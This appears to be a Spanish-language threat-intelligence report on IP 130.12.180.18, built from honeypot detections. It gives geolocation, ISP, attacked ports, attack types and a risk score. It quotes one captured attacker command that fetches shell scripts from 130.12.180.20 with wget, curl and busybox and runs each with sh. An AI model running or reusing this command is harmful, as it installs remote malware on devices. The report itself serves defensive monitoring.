Amenaza Activa β’ ALTO
130.12.180.18
Pais de OrigenπΊπΈ United States
Primera Deteccion28/12/2025
Ultima Actividad30/12/2025
ISPRailnet LLC
π―
110
Ataques Totales
π
9
Puertos
π‘
4
Tipos Ataque
π¦
0
Malware
Geolocalizacion
- Pais
- πΊπΈ United States
- Ciudad
- Desconocida
- ASN
- AS214943
- ISP
- Railnet LLC
Tipos de Ataque
tanner
adbhoney
dionaea
honeytrap
Puertos Atacados
8000345678081808137777555580888888
Malware Asociado
Sin malware asociado
Comandos Ejecutados
$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh9xEvaluacion de Riesgo
65
/100
BajoMedioAltoCritico